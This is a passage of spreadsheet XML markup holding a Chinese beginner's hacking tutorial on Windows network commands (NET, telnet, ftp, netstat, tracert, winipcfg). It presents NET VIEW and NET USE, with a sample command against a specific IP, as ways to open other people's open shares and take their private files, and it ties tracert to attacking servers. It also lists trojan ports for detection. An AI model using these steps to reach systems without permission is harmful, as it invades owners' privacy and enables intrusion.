      <t xml:space="preserve">NET STOP </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止网络服务</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET TIME </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>使计算机的时钟与另一台计算机或域的时间同步</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET USE </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET VER </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示局域网内正在使用的网络连接类型和信息</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">NET VIEW </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示域列表、计算机列表或指定计算机的共享资源列表</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这些命令在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win95/98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中支持的比较少，只有几个基本常见的，而在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中又元元多于上面的介绍，不过大多数对于初学者也没有必要掌握，所以我选择了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WindowsME</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进行介绍，其中最常用到的是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NET VIEW</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NET USE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，通过者两个命令，学习者可以连接网络上开放了远程共享的系统，并且获得资料。这种远程共享本来是为便捷操作设计的，但是很多网络管理员忽视了它的安全性，所以造成了很多不应该共享的信息的暴露，对于学习者来说，则可以轻易获得它人电脑上的隐私资料。</t>
    </r>
  </si>
  <si>
    <r>
      <t>例如在控制台下输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>net view \\202.96.50.24</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则可以获得对应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的系统共享目录，进而找到他们的共享文件，当然这需要</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>202.96.50.24</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统的确存在共享目录，具体如何找到这些存在共享的系统，我将会在后面的文章中进行介绍。</t>
    </r>
  </si>
  <si>
    <r>
      <t>三、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ftp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这两个命令分别可以远程对系统进行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ftp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆，两种登陆使用的不同的协议，分别属于两种不同的网络服务，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ftp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是远程文件共享服务，也就是说学习者可以将自己的资料上传、下载，但是它并没有过多的权利，无法在远程电脑上执行上传的文件；而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则属于远程登陆服务，也就是说可以登陆到远程系统上，并获得一个解释器权限，拥有解释器就意味着拥有了一定的权限，这种权限可能是基本的文件操作、也可能是可以控制系统的管理员权限。</t>
    </r>
  </si>
  <si>
    <r>
      <t>四、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netstat</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，如采用的协议类型、当前主机与远端相连主机（一个或多个）的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址以及它们之间的连接状态等。使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">netstat </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？可以显示它的命令格式和参数说明：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中的参数说明如下：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-a </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示所有主机的端口号；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-e </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示以太网统计信息；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-n </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以数字表格形式显示地址和端口；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-p proto </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示特定的协议的具体使用信息；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-r </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示本机路由表的内容；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">-s </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示每个协议的使用状态（包括</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>UDP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">interval </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重新显示所选的状态，每次显示之间的间隔数（单位秒）。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    netstat</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令的主要用途是检测本地系统开放的端口，这样做可以了解自己的系统开放了什么服务、还可以初步推断系统是否存在木马，因为常见的网络服务开放的默认端口轻易不会被木马占用，例如：用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（文件传输协议）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>21</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TELNET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（远程登录协议）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>23</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SMTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（邮件传输协议）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>25</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（域名服务，即域名与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>之间的转换）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>53</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HTTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（超文本传输协议）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>80</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>POP3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（电子邮件的一种接收协议）的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>110</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>WINDOWS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中开放的端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>139</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，除此以外，如果系统中还有其他陌生的到口，就可能是木马程序使用的了。通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netstat</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>netstat -a</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以观察开放的端口，如果发现下面的端口，就说明已经有木马程序在系统中存在：</t>
    </r>
  </si>
  <si>
    <r>
      <t>31337</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>号端口是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BackOffice</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木马的默认端口；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1999</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Yai</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木马程序；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2140</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3150</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>都是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DEEP THROAT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木马使用的端口；还有</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NETBUS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、冰河或者</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SUB7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等木马程序都可以自定义端口，因此发现了陌生端口一定要提高警惕，使用防火墙或者查病毒软件进行检测。</t>
    </r>
  </si>
  <si>
    <r>
      <t>五、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tracert</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tracert</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令的格式如下：</t>
    </r>
  </si>
  <si>
    <t>tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name</t>
  </si>
  <si>
    <r>
      <t>命令行中的参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-d</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是要求</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tracert</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不对主机名进行解析，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-h</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是指定搜索到目的地址的最大轮数，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-j</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的功能是沿着主机列表释放源路由，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>-w</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用来设置超时时间间隔。</t>
    </r>
  </si>
  <si>
    <r>
      <t>通过</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tracert</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以判断一个服务器是属于国内还是国际（网络服务器的物理未知不能依靠域名进行判断），根据路由路经可以判断信息从自己的系统发送到网络上，先后经过了哪些</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>到大对方服务器，这就好像乘公共汽车的时候从起点出发到达终点站的时候，中途会出现很多路牌一个道理，我们清楚了自己的信息的传送路径，才能够更清晰的了解网络、对服务器进行攻击。</t>
    </r>
  </si>
  <si>
    <r>
      <t>六、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>winipcfg</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    winipcfg</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>都是用来显示主机内</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>协议的配置信息。只是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>winipcfg</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows 95/98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>适用于</t>
    </r>
    <r>
      <rPr>
